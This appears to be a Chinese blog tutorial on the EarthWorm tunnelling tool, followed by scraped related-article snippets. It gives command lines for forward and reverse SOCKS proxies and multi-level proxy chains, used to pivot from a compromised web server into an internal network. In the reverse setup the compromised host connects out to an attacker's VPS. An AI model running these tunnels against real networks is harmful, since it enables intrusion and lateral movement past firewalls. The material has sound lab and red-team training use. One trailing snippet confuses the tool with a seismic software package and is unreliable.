Earthworm使用

于 2024-11-05 13:28:11 发布
阅读量1.1k 收藏 6
点赞数 17
分类专栏: 内网隧道代理技术 文章标签: 服务器 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64177395/article/details/143505820
版权

Earthworm简介

Earthworm简称EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功 能,可在复杂网络环境下完成网络穿透

该工具已经停止维护和下载:http://rootkiter.com/EarthWorm/

该工具支持端口转发,正向代理,反向代理,多级代理等方式,可以打通一条网络隧道,直达网络深 处,用蚯蚓独有的手段突破网络限制

接下来我们学习一下

下载地址;https://github.com/idlefire/ew

(一级代理)正向代理

拓扑图如下

正向意思就是攻击者可以访问目标的机器,也就意味着目标的机器在公网,如下拓扑

正向连接就是黑客主动连接web服务器,在web开启监听

web服务器执行如下命令

ew -s ssocksd -l 1080

黑客的电脑使用froxyifile或者proxychains等工具进行连接

实验步骤

1、使用漏洞讲web服务器控制下来然后上传ew工具执行开启监听

2、使用proxyifile连接

3、配置代理规则

4、使用工具测试

5、测试linux

(一级代理)反向代理

反向连接适合于目标没有公网 IP 的情况,这时就需要一台公网 vps 了,这里就直接以内网地址作为演示了

VPS执行如下

ew -s rcsocks -l 1080 -e 4444

目标器执行如下

ew -s rssocks -d vps -e 4444

这条命令表示在本地开启 socks 5 服务,并反弹到 vps 的 4444 端口,如果代理建立成功,在 VPS 端就 会看到 rssocks cmd_socket OK! 的提示

在黑客的机器上使用工具连接VPS的1080端口

实验步骤

1、先在VPS上开启监听

ew -s rcsocks -l 1080 -e 4444

2、然后再靶机上连接VPS

ew -s rssocks -d vps -e 4444

3、在黑客电脑上使用工具连接

(二级代理)正向连接二级代理

二级代理发生在如下的情况

1、web服务器在公网黑客可以访问

2、B机器在内网黑客不能访问

3、web服务器只能访问B机器

4、B机器可以访问内网机器

这种昂情况使用二级正向代理

在B主机上执行

ew -s ssocksd -l 4444

在web服务器上执行

ew -s lcx_tran -l 1080 -f B -g 4444

黑客使用工具连接web服务器的1080端口从而实现访问内网机器

实验步骤

1、在内网的机器B上执行命令

ew -s ssocksd -l 4444

2、在web机器上执行如下命令

ew -s lcx_tran -l 1080 -f B -g 4444

3、测试代理

(二级代理)反向连接

反向代理的拓扑路线如下

1、web服务器在内网可以访问VPS

2、内网机器B在内网不能访问VPS可以访问web服务

vps

ew -s lcx_listen -l 1080 -e 4444

主机B

ew -s ssocksd -l 5555

主机A

ew -s lcx_slave -d vps_ip -e 4444 -f hostB_ip -g 5555

内网渗透-Earthworm的简单使用(内网穿透工具)
lza20001103的博客
08-11 2109
内网渗透-Earthworm的简单使用(内网穿透工具)
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web...
earthworm全套.zip
10-14
包含全套earthworm服务器、客户端。EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用
EarthWorm-20180630.zip
08-05
EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS等
Earthworm.zip
04-13
Earthworm.zip
内网穿透大杀器--EarthWorm
热门推荐
大方子
08-24 2万+
0x00 前言如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持! 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。 本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。 它强在哪些方面呢? 1.可穿...
Earthworm-Web.github.io:这是Earthworm-Web的后台管理存储库
05-04
worm网 这是的后台管理存储库。 人(5)
EarthWorm_WORM_
09-29
【标题】"EarthWorm_WORM_" 指涉的是一个特定类型的计算机蠕虫病毒,名为 "EarthWorm"。蠕虫(WORM)是一种自我复制的恶意软件,能够在网络中独立传播,无需人类交互。它通常利用系统漏洞、网络共享资源或者电子邮件...
利用EarthWorm轻松穿透目标多级内网
Neo
11-08 1万+
0x01 ew 快速穿透目标多级内网: 简要环境说明: 1.win2008R2 假设为目标边界web服务器,可正常访问公网 2.假设其公网ip为 192.168.3.23 3.假设其内网ip为 192.168.32.131 1.win2008 假设为目标内网数据库服务器,可正常访问公网 2.假设其内网ip为 192.168.32.170 1.win7 假设为自己公网的vps 2.假设其公网...
EarthWorm_20180630版本.tgz
06-19
English Pages 支持列表 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。 注: 考虑到该工具影响很坏,该工具永久停止更新。 所以我自己保留了一份。
内网渗透工具Earthworm简单使用
1
02-15 4096
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。 项目地址:https://github.com/idlefire/ew 打开项目的文件,里面非常清楚的写了如何使用,我们
earthworm四步走(解决拨入VPN后使用burp无法抓包的问题)
kk的博客
07-30 1253
三、执行命令:ew_for_Win.exe -s ssocksd -l 8888。四、设置burp上游代理。
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 2241
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
EW代理工具的使用说明
Ays.Ie的博客
05-18 2377
本篇介绍了ew代理转发工具,以及简单的应用
攻防演练中内网代理常用工具总结
最新发布
wangluoanquan111的博客
08-19 687
一个网络请求一般是由客户端发起,服务器响应,而代理服务是这个网络请求的中介,其作用是将客户端的网络请求经由自身代理服务转发至服务端。某些情况下客户端无法直接访问服务端,但代理服务端可以访问服务端,此时客户端与代理服务端建立协议,客户端的请求都经由代理端转发至服务端这便是正向代理。正向代理主要面向客户端服务,服务端的响应会返回给代理服务端,代理服务端会将其转发至客户端。故而正向代理的过程中,服务端无法确定请求的真实发起者,仅与代理端进行通信。
EarthWorm常用
教Linux的李老师
08-10 512
EarthWorm常用
earthworm的linux使用
03-27
作为人工智能语言模型,我无法在Linux上使用Earthworm软件,但我可以告诉您如何在Linux系统上安装和使用Earthworm软件。 安装Earthworm软件 1. 下载Earthworm软件包,可以从官网或Github上获取最新版本。 2. 解压缩Earthworm软件包,可以使用tar命令进行解压缩。 3. 进入解压缩后的Earthworm目录,使用make命令进行编译和安装。 4. 在安装过程中,可以根据需要选择安装Earthworm的各个模块和插件。 使用Earthworm软件 1. 在启动Earthworm之前,需要先配置Earthworm环境变量,可以将Earthworm的bin目录添加到系统的PATH环境变量中。 2. 启动Earthworm服务,可以使用ewd命令启动Earthworm daemon进程。 3. 使用各个Earthworm模块和插件,可以根据需要进行配置和启动。 4. 查看Earthworm日志和输出信息,可以使用ewlog命令查看Earthworm日志文件,使用ewcmd命令查看Earthworm模块和插件的输出信息。 需要注意的是,Earthworm软件是一个高级的地震数据处理系统,需要一定的专业知识和经验才能够正确地使用。在使用Earthworm软件时,请务必仔细阅读相关文档和使用说明,以免造成不必要的损失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值